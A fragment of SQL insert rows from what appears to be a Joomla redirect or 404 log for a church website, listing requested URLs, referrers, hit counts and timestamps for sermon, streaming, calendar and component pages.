(126, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/9/-', NULL, '', '', 1, 0, '2017-01-01 17:55:44', '0000-00-00 00:00:00', 301),
(127, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/8/-', NULL, '', '', 1, 0, '2017-01-01 17:55:53', '0000-00-00 00:00:00', 301),
(128, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/22/-', NULL, '', '', 1, 0, '2017-01-01 17:56:03', '0000-00-00 00:00:00', 301),
(129, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/5/-', NULL, '', '', 1, 0, '2017-01-01 17:56:12', '0000-00-00 00:00:00', 301),
(130, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/24/-', NULL, '', '', 1, 0, '2017-01-01 17:56:21', '0000-00-00 00:00:00', 301),
(131, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/7/-', NULL, '', '', 1, 0, '2017-01-01 17:56:31', '0000-00-00 00:00:00', 301),
(132, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/19/-', NULL, '', '', 1, 0, '2017-01-01 17:56:40', '0000-00-00 00:00:00', 301),
(133, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/5/-', NULL, '', '', 1, 0, '2017-01-01 17:56:50', '0000-00-00 00:00:00', 301),
(134, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/25/-', NULL, '', '', 1, 0, '2017-01-01 17:56:59', '0000-00-00 00:00:00', 301),
(135, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/19/-', NULL, '', '', 1, 0, '2017-01-01 17:57:09', '0000-00-00 00:00:00', 301),
(136, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1951/12/-', NULL, '', '', 1, 0, '2017-01-01 17:57:18', '0000-00-00 00:00:00', 301),
(137, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/15/-', NULL, '', '', 1, 0, '2017-01-01 17:57:38', '0000-00-00 00:00:00', 301),
(138, 'http://www.lifeoasisinternationalchurch.org/gallery', NULL, '', '', 59, 0, '2017-01-01 19:57:29', '0000-00-00 00:00:00', 301),
(139, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-category/itemlist/tag/music', NULL, '', '', 1, 0, '2017-01-01 19:57:50', '0000-00-00 00:00:00', 301),
(140, 'http://lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=6e7dc691f228ea3045b53382f7261dadd85c2a34&task=ajax&action=unloaded', NULL, 'http://lifeoasisinternationalchurch.org/ministries/outreach', '', 3, 0, '2017-01-01 20:01:24', '0000-00-00 00:00:00', 301),
(141, 'http://lifeoasisinternationalchurch.org/streaming', NULL, '', '', 57, 0, '2017-01-01 20:02:45', '0000-00-00 00:00:00', 301),
(142, 'http://lifeoasisinternationalchurch.org/digital/downloads', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-01 20:03:21', '0000-00-00 00:00:00', 301),
(143, 'http://www.lifeoasisinternationalchurch.org/streaming', NULL, 'http://r.search.yahoo.com/_ylt=A86.J7.xYWlYFwMA1V8PxQt.;_ylu=X3oDMTByb2lvbXVuBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1483330097/RO=10/RU=http%3a%2f%2fwww.lifeoasisinternationalchurch.org%2fstreaming/RK=0/RS=hRPBVQCyZ_nkeGIEN0oFY74XBrY-', '', 288, 0, '2017-01-01 20:09:05', '0000-00-00 00:00:00', 301),
(144, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 91, 0, '2017-01-01 20:11:26', '0000-00-00 00:00:00', 301),
(145, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'http://www.lifeoasisinternationalchurch.org', '', 4075, 0, '2017-01-01 20:11:28', '0000-00-00 00:00:00', 301),
(146, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php/component/users/?view=registration', '', 5392, 0, '2017-01-01 20:11:31', '0000-00-00 00:00:00', 301),
(147, 'http://www.lifeoasisinternationalchurch.org/index.php/component/user/?task=register', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 181, 0, '2017-01-01 20:11:31', '0000-00-00 00:00:00', 301),
(148, 'http://lifeoasisinternationalchurch.org/adminisrator', NULL, '', '', 1, 0, '2017-01-01 20:22:18', '0000-00-00 00:00:00', 301),
(149, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=cf91d39573dd80f3ef2aea958ed0fbd37f256737&task=ajax&action=unloaded', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 5, 0, '2017-01-01 20:23:02', '0000-00-00 00:00:00', 301),
(150, 'http://lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=cf91d39573dd80f3ef2aea958ed0fbd37f256737&task=ajax&action=unloaded', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 5, 0, '2017-01-01 20:29:27', '0000-00-00 00:00:00', 301),
(151, 'http://lifeoasisinternationalchurch.org/resources/live-streaming', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-01 20:30:04', '0000-00-00 00:00:00', 301),
(152, 'http://lifeoasisinternationalchurch.org/resources/baptism', NULL, '', '', 57, 0, '2017-01-01 20:33:53', '0000-00-00 00:00:00', 301),
(153, 'http://lifeoasisinternationalchurch.org/index.php/281-day-21-of-21-days-fasting-and-prayer-november', NULL, '', '', 4, 0, '2017-01-01 20:43:38', '0000-00-00 00:00:00', 301),
(154, 'http://lifeoasisinternationalchurch.org/mp3-messages', NULL, '', '', 527, 0, '2017-01-01 20:51:11', '0000-00-00 00:00:00', 301),
(155, 'http://ljmti.lifeoasisinternationalchurch.org/resources/podcast', NULL, '', '', 2, 0, '2017-01-01 20:54:03', '0000-00-00 00:00:00', 301),
(156, 'http://lifeoasisinternationalchurch.org/about-us/dream-centre-ordained-pastors', NULL, '', '', 53, 0, '2017-01-01 20:55:21', '0000-00-00 00:00:00', 301),
(157, 'http://lifeoasisinternationalchurch.org/11-demo-articles/20-welcome', NULL, '', '', 36, 0, '2017-01-01 20:55:21', '0000-00-00 00:00:00', 301),
(158, 'http://lifeoasisinternationalchurch.org/ministries/wimmp', NULL, '', '', 33, 0, '2017-01-01 20:57:43', '0000-00-00 00:00:00', 301),
(159, 'http://www.lifeoasisinternationalchurch.org/resources/index.php', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/youtube-live', '', 7, 0, '2017-01-01 21:18:13', '0000-00-00 00:00:00', 301),
(160, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads?download=5:passion-for-the-lost', NULL, '', '', 1, 0, '2017-01-01 21:27:25', '0000-00-00 00:00:00', 301),
(161, 'http://lifeoasisinternationalchurch.org/media/system/css/css-d88325c26fccffc16fdcbe6895c17519.php', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 47, 0, '2017-01-01 21:49:53', '0000-00-00 00:00:00', 301),
(162, 'http://lifeoasisinternationalchurch.org/libraries/gantry/css/css-b4379d4b784b871d08a807fd76531d51.php', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-01-01 21:49:53', '0000-00-00 00:00:00', 301),
(163, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun', NULL, 'https://www.google.com.ng/', '', 40, 0, '2017-01-01 21:55:25', '0000-00-00 00:00:00', 301),
(164, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads?download=6:your-new-life', NULL, '', '', 1, 0, '2017-01-01 22:00:44', '0000-00-00 00:00:00', 301),
(165, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?start=20', NULL, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?start=20', '', 12, 0, '2017-01-01 22:04:38', '0000-00-00 00:00:00', 301),
(166, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/HTML5', NULL, '', '', 1, 0, '2017-01-01 22:11:47', '0000-00-00 00:00:00', 301),
(167, 'http://lifeoasisinternationalchurch.org/index.php/268-day-8-of-21-days-fasting-and-prayer-november', NULL, '', '', 8, 0, '2017-01-01 22:15:24', '0000-00-00 00:00:00', 301),
(168, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/ljmti', NULL, '', '', 43, 0, '2017-01-01 22:39:04', '0000-00-00 00:00:00', 301),
(169, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/itemlist/tag/media', NULL, '', '', 1, 0, '2017-01-01 22:45:17', '0000-00-00 00:00:00', 301),
(170, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=6e7dc691f228ea3045b53382f7261dadd85c2a34&task=ajax&action=unloaded', NULL, 'http://www.lifeoasisinternationalchurch.org/streaming', '', 7, 0, '2017-01-01 22:54:28', '0000-00-00 00:00:00', 301),
(171, 'http://www.lifeoasisinternationalchurch.org/resources/youtube-live', NULL, '', '', 299, 0, '2017-01-01 23:30:33', '0000-00-00 00:00:00', 301),
(172, 'http://lifeoasisinternationalchurch.org/ministries/books', NULL, '', '', 45, 0, '2017-01-02 00:22:01', '0000-00-00 00:00:00', 301),
(173, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/21', NULL, '', '', 58, 0, '2017-01-02 00:40:04', '0000-00-00 00:00:00', 301),
(174, 'http://lifeoasisinternationalchurch.org/404testpage4525d2fdc', NULL, 'http://sucuri.net', '', 871, 0, '2017-01-02 00:59:16', '0000-00-00 00:00:00', 301),
(175, 'http://www.lifeoasisinternationalchurch.org/index.php/278-day-18-of-21-days-fasting-and-prayer-november', NULL, '', '', 10, 0, '2017-01-02 01:15:03', '0000-00-00 00:00:00', 301),
(176, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads?download=3:kingdom-leadership-studies-publication-27th-november-2016', NULL, '', '', 1, 0, '2017-01-02 01:32:43', '0000-00-00 00:00:00', 301),
(177, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/1/-', NULL, '', '', 1, 0, '2017-01-02 01:52:56', '0000-00-00 00:00:00', 301),
(178, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/28/-', NULL, '', '', 1, 0, '2017-01-02 01:53:08', '0000-00-00 00:00:00', 301),
(179, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/2/-', NULL, '', '', 1, 0, '2017-01-02 01:53:22', '0000-00-00 00:00:00', 301),
(180, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/1/-', NULL, '', '', 1, 0, '2017-01-02 01:53:35', '0000-00-00 00:00:00', 301),
(181, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/27/-', NULL, '', '', 1, 0, '2017-01-02 01:54:01', '0000-00-00 00:00:00', 301),
(182, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/12/3/-', NULL, '', '', 1, 0, '2017-01-02 01:54:15', '0000-00-00 00:00:00', 301),
(183, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/5/9/-', NULL, '', '', 1, 0, '2017-01-02 01:54:28', '0000-00-00 00:00:00', 301),
(184, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/25/-', NULL, '', '', 1, 0, '2017-01-02 01:54:41', '0000-00-00 00:00:00', 301),
(185, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/13/-', NULL, '', '', 1, 0, '2017-01-02 01:54:54', '0000-00-00 00:00:00', 301),
(186, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/20/-', NULL, '', '', 1, 0, '2017-01-02 01:55:07', '0000-00-00 00:00:00', 301),
(187, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/29/-', NULL, '', '', 1, 0, '2017-01-02 01:55:20', '0000-00-00 00:00:00', 301),
(188, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/24/-', NULL, '', '', 1, 0, '2017-01-02 01:55:33', '0000-00-00 00:00:00', 301),
(189, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/11/-', NULL, '', '', 1, 0, '2017-01-02 01:55:46', '0000-00-00 00:00:00', 301),
(190, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/11/-', NULL, '', '', 1, 0, '2017-01-02 01:55:59', '0000-00-00 00:00:00', 301),
(191, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/26/-', NULL, '', '', 1, 0, '2017-01-02 01:56:12', '0000-00-00 00:00:00', 301),
(192, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/22/-', NULL, '', '', 1, 0, '2017-01-02 01:56:25', '0000-00-00 00:00:00', 301),
(193, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/5/-', NULL, '', '', 1, 0, '2017-01-02 01:56:39', '0000-00-00 00:00:00', 301),
(194, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/8/-', NULL, '', '', 1, 0, '2017-01-02 02:03:15', '0000-00-00 00:00:00', 301),
(195, 'http://www.lifeoasisinternationalchurch.org/ministries/books', NULL, 'http://www.google.com.ng/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjnhee0r6LRAhULMVAKHV7LC78QFggYMAA&url=http%3A%2F%2Fwww.lifeoasisinternationalchurch.org%2Fministries%2Fbooks&usg=AFQjCNFIA49ECU2OyckrVGlYvths4lIoPA&sig2=wmWvZCPMbzR3hmrfrewhTQ&bvm=bv.142059868,d.ZWM', '', 61, 0, '2017-01-02 02:04:14', '0000-00-00 00:00:00', 301),
(196, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/30/-', NULL, '', '', 1, 0, '2017-01-02 02:18:23', '0000-00-00 00:00:00', 301),
(197, 'http://www.lifeoasisinternationalchurch.org/resources/podcast', NULL, '', '', 22, 0, '2017-01-02 02:24:27', '0000-00-00 00:00:00', 301),
(198, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/3/-', NULL, '', '', 1, 0, '2017-01-02 02:33:31', '0000-00-00 00:00:00', 301),
(199, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages', NULL, 'http://www.spiritmeat.net/index.php/1372-who-are-you-romans-4-17-psalms-127-2', '', 685, 0, '2017-01-02 02:36:16', '0000-00-00 00:00:00', 301),
(200, 'http://lifeoasisinternationalchurch.org/hidden-stream', NULL, '', '', 63, 0, '2017-01-02 02:45:41', '0000-00-00 00:00:00', 301),
(201, 'http://lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', NULL, '', '', 27, 0, '2017-01-02 02:45:42', '0000-00-00 00:00:00', 301),
(202, 'http://lifeoasisinternationalchurch.org/about-us/rev-oyenike-areogun', NULL, '', '', 45, 0, '2017-01-02 02:45:42', '0000-00-00 00:00:00', 301),
(203, 'http://lifeoasisinternationalchurch.org/resources/youtube-live', NULL, '', '', 119, 0, '2017-01-02 02:45:42', '0000-00-00 00:00:00', 301),
(204, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/30/-', NULL, '', '', 1, 0, '2017-01-02 02:48:39', '0000-00-00 00:00:00', 301),
(205, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 30, 0, '2017-01-02 02:56:01', '0000-00-00 00:00:00', 301),
(206, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/20/-', NULL, '', '', 1, 0, '2017-01-02 03:00:00', '0000-00-00 00:00:00', 301),
(207, 'http://www.lifeoasisinternationalchurch.org/contact-us/church-locations', NULL, '', '', 14, 0, '2017-01-02 03:02:21', '0000-00-00 00:00:00', 301),
(208, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/1/-', NULL, '', '', 1, 0, '2017-01-02 03:03:47', '0000-00-00 00:00:00', 301),
(209, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/10/18/-', NULL, '', '', 1, 0, '2017-01-02 03:07:35', '0000-00-00 00:00:00', 301),
(210, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, 'http://www.google.com.ng/search?client=tablet-android-samsung&hl=en-GB&source=android-search-app&v=141400000&q=olusola+areogun+biography&sa=X&ved=0ahUKEwiNnPP1vaLRAhVIYFAKHRexDuwQ1QIIbigF&biw=1280&bih=800', '', 142, 0, '2017-01-02 03:10:23', '0000-00-00 00:00:00', 301),
(211, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1865/12/26/-', NULL, '', '', 1, 0, '2017-01-02 03:11:21', '0000-00-00 00:00:00', 301),
(212, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/11/7/-', NULL, '', '', 1, 0, '2017-01-02 03:15:10', '0000-00-00 00:00:00', 301),
(213, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?start=20', '', 4, 0, '2017-01-02 03:16:02', '0000-00-00 00:00:00', 301),
(214, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?start=20', NULL, 'https://www.google.com.ng/', '', 70, 0, '2017-01-02 03:18:47', '0000-00-00 00:00:00', 301),
(215, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1954/12/-', NULL, '', '', 1, 0, '2017-01-02 03:18:56', '0000-00-00 00:00:00', 301),
(216, 'http://lifeoasisinternationalchurch.org/component/jcomments/captcha/59563', NULL, '', '', 1, 0, '2017-01-02 03:25:20', '0000-00-00 00:00:00', 301),
(217, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/24/-', NULL, '', '', 1, 0, '2017-01-02 03:26:29', '0000-00-00 00:00:00', 301),
(218, 'http://lifeoasisinternationalchurch.org/index.php/276-day-16-of-21-days-fasting-and-prayer-november', NULL, '', '', 1, 0, '2017-01-02 03:30:05', '0000-00-00 00:00:00', 301),
(219, 'http://ljmti.lifeoasisinternationalchurch.org/digital/blog/item/12-business', NULL, '', '', 1, 0, '2017-01-02 04:07:47', '0000-00-00 00:00:00', 301),
(220, 'http://www.lifeoasisinternationalchurch.org/streaming/18-loic/50-young-achievers', NULL, '', '', 14, 0, '2017-01-02 04:07:57', '0000-00-00 00:00:00', 301),
(221, 'http://ljmti.lifeoasisinternationalchurch.org/digital/blog/item/10-sensitivity', NULL, '', '', 1, 0, '2017-01-02 04:13:01', '0000-00-00 00:00:00', 301),
(222, 'http://lifeoasisinternationalchurch.org/resources/salvation', NULL, '', '', 55, 0, '2017-01-02 04:23:09', '0000-00-00 00:00:00', 301),
(223, 'http://www.lifeoasisinternationalchurch.org/component/jlexblock/?task=password', NULL, '', '', 1, 0, '2017-01-02 04:45:49', '0000-00-00 00:00:00', 301),
(224, 'http://www.lifeoasisinternationalchurch.org/resources/hd', NULL, '', '', 81, 0, '2017-01-02 05:25:02', '0000-00-00 00:00:00', 301),
(225, 'http://www.lifeoasisinternationalchurch.org/slivestreaming', NULL, '', '', 1, 0, '2017-01-02 05:26:12', '0000-00-00 00:00:00', 301),
(226, 'http://www.lifeoasisinternationalchurch.org/livestreaming', NULL, '', '', 88, 0, '2017-01-02 05:26:33', '0000-00-00 00:00:00', 301),
(227, 'http://lifeoasisinternationalchurch.org/component/jlexblock/?task=password', NULL, '', '', 1, 0, '2017-01-02 05:27:52', '0000-00-00 00:00:00', 301),
(228, 'http://www.lifeoasisinternationalchurch.org/resources/stream', NULL, '', '', 238, 0, '2017-01-02 05:29:47', '0000-00-00 00:00:00', 301),
(229, 'http://lifeoasisinternationalchurch.org/resources/podcast', NULL, 'http://lifeoasisinternationalchurch.org/', '', 13, 0, '2017-01-02 05:34:36', '0000-00-00 00:00:00', 301),
(230, 'http://lifeoasisinternationalchurch.org/livestreaming', NULL, '', '', 69, 0, '2017-01-02 05:44:16', '0000-00-00 00:00:00', 301),
(231, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 17, 0, '2017-01-02 05:54:18', '0000-00-00 00:00:00', 301),
(232, 'http://www.lifeoasisinternationalchurch.org/loicforum/archive/index.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loicforum/archive/index.php', '', 35, 0, '2017-01-02 05:54:36', '0000-00-00 00:00:00', 301),
(233, 'http://lifeoasisinternationalchurch.org/loicforum/archive/index.php', NULL, 'http://lifeoasisinternationalchurch.org/loicforum/archive/index.php', '', 1, 0, '2017-01-02 05:54:37', '0000-00-00 00:00:00', 301),
(234, 'http://www.lifeoasisinternationalchurch.org/component/jlexblock/', NULL, '', '', 84, 0, '2017-01-02 05:58:06', '0000-00-00 00:00:00', 301),
(235, 'http://www.lifeoasisinternationalchurch.org/index.php/videos', NULL, '', '', 104, 0, '2017-01-02 06:02:06', '0000-00-00 00:00:00', 301),
(236, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/20-welcome', NULL, '', '', 43, 0, '2017-01-02 06:09:36', '0000-00-00 00:00:00', 301),
(237, 'http://www.lifeoasisinternationalchurch.org/18-loic/34-music', NULL, '', '', 32, 0, '2017-01-02 06:15:20', '0000-00-00 00:00:00', 301),
(238, 'http://www.lifeoasisinternationalchurch.org/11-demo-articles/53-testing', NULL, '', '', 13, 0, '2017-01-02 06:15:20', '0000-00-00 00:00:00', 301),
(239, 'http://www.lifeoasisinternationalchurch.org/resources/hd/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-01-02 06:15:28', '0000-00-00 00:00:00', 301),
(240, 'http://www.lifeoasisinternationalchurch.org/resources/streaming-registered?view=remind', NULL, '', '', 1, 0, '2017-01-02 06:15:28', '0000-00-00 00:00:00', 301),
(241, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?sermon_cat=21&start=20', NULL, '', '', 3, 0, '2017-01-02 06:15:33', '0000-00-00 00:00:00', 301),
(242, 'http://www.lifeoasisinternationalchurch.org/resources/streaming-registered?view=reset', NULL, '', '', 1, 0, '2017-01-02 06:15:37', '0000-00-00 00:00:00', 301),
(243, 'http://lifeoasisinternationalchurch.org/cache/js-ecb9b3b66c1543498b4dab570ffb7189.php', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-01-02 06:19:15', '0000-00-00 00:00:00', 301),
(244, 'http://lifeoasisinternationalchurch.org/template-info-2/the-church-2', NULL, '', '', 98, 0, '2017-01-02 07:07:22', '0000-00-00 00:00:00', 301),
(245, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/theme', NULL, '', '', 1, 0, '2017-01-02 07:08:31', '0000-00-00 00:00:00', 301),
(246, 'http://lifeoasisinternationalchurch.org/33-prayer-a-fasting-day-24', NULL, '', '', 23, 0, '2017-01-02 07:09:00', '0000-00-00 00:00:00', 301),
(247, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/7', NULL, '', '', 8, 0, '2017-01-02 07:13:56', '0000-00-00 00:00:00', 301),
(248, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/1', NULL, '', '', 56, 0, '2017-01-02 07:13:56', '0000-00-00 00:00:00', 301),
(249, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/13', NULL, '', '', 4, 0, '2017-01-02 07:13:56', '0000-00-00 00:00:00', 301),
(250, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/3', NULL, '', '', 8, 0, '2017-01-02 07:13:56', '0000-00-00 00:00:00', 301),
(251, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti', NULL, 'https://www.google.com.ng/', '', 57, 0, '2017-01-02 07:19:30', '0000-00-00 00:00:00', 301),
(252, 'http://www.lifeoasisinternationalchurch.org/media/system/css/css-d88325c26fccffc16fdcbe6895c17519.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 139, 0, '2017-01-02 07:38:50', '0000-00-00 00:00:00', 301),
(253, 'http://www.lifeoasisinternationalchurch.org/components/com_imageshow/assets/css/css-eb60729619b4687631fb0af5f7a0a8cc.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 27, 0, '2017-01-02 07:38:50', '0000-00-00 00:00:00', 301),
(254, 'http://www.lifeoasisinternationalchurch.org/media/com_acymailing/css/css-6519469ace9dc29cf2caa5b8bed4a411.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 69, 0, '2017-01-02 07:38:51', '0000-00-00 00:00:00', 301),
(255, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-5cfcfda318d771d4268420865bce0950.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 72, 0, '2017-01-02 07:38:51', '0000-00-00 00:00:00', 301),
(256, 'http://www.lifeoasisinternationalchurch.org/libraries/gantry/css/css-b4379d4b784b871d08a807fd76531d51.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 5, 0, '2017-01-02 07:38:51', '0000-00-00 00:00:00', 301),
(257, 'http://www.lifeoasisinternationalchurch.org/plugins/system/rokbox/themes/light/css-b518d664167dd795248190ff44b8159f.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 28, 0, '2017-01-02 07:38:51', '0000-00-00 00:00:00', 301),
(258, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/features/themes/slideshow/css-d768001f3c2bf8ee35738bc5c28af2db.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 67, 0, '2017-01-02 07:38:52', '0000-00-00 00:00:00', 301),
(259, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/headlines/themes/default/css-be655ee638bd52b1c1503fcccf4f9864.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 71, 0, '2017-01-02 07:38:52', '0000-00-00 00:00:00', 301),
(260, 'http://www.lifeoasisinternationalchurch.org/cache/js-34ace5eb757db344e6fce10747c0b122.php', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-02 07:38:52', '0000-00-00 00:00:00', 301),
(261, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/itemlist/tag/CSS3', NULL, '', '', 1, 0, '2017-01-02 07:42:08', '0000-00-00 00:00:00', 301),
(262, 'http://www.lifeoasisinternationalchurch.org/index.php/239-2016-day-22', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/263-day-3-of-21-days-fasting-and-prayer-november', '', 10, 0, '2017-01-02 07:46:01', '0000-00-00 00:00:00', 301),
(263, 'http://www.lifeoasisinternationalchurch.org/index.php/238-2016-day-21', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/263-day-3-of-21-days-fasting-and-prayer-november', '', 10, 0, '2017-01-02 07:46:30', '0000-00-00 00:00:00', 301),
(264, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/our-service-schedule', NULL, '', '', 55, 0, '2017-01-02 08:01:23', '0000-00-00 00:00:00', 301),
(265, 'http://www.lifeoasisinternationalchurch.org/18-loic/44-programme', NULL, '', '', 29, 0, '2017-01-02 08:01:23', '0000-00-00 00:00:00', 301),
(266, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/outreach', NULL, '', '', 9, 0, '2017-01-02 08:01:23', '0000-00-00 00:00:00', 301),
(267, 'http://www.lifeoasisinternationalchurch.org/simmp/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-02 08:01:23', '0000-00-00 00:00:00', 301),
(268, 'http://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/35-trm', NULL, '', '', 38, 0, '2017-01-02 08:01:24', '0000-00-00 00:00:00', 301),
(269, 'http://lifeoasisinternationalchurch.org/udd.php', NULL, '', '', 2, 0, '2017-01-02 08:40:32', '0000-00-00 00:00:00', 301),
(270, 'http://www.lifeoasisinternationalchurch.org/about-us/the-church-2', NULL, 'https://www.google.com.ng/', '', 60, 0, '2017-01-02 08:54:20', '0000-00-00 00:00:00', 301),
(271, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/2', NULL, '', '', 1, 0, '2017-01-02 09:05:34', '0000-00-00 00:00:00', 301),
(272, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/18-sample-content-7', NULL, '', '', 4, 0, '2017-01-02 09:05:38', '0000-00-00 00:00:00', 301),
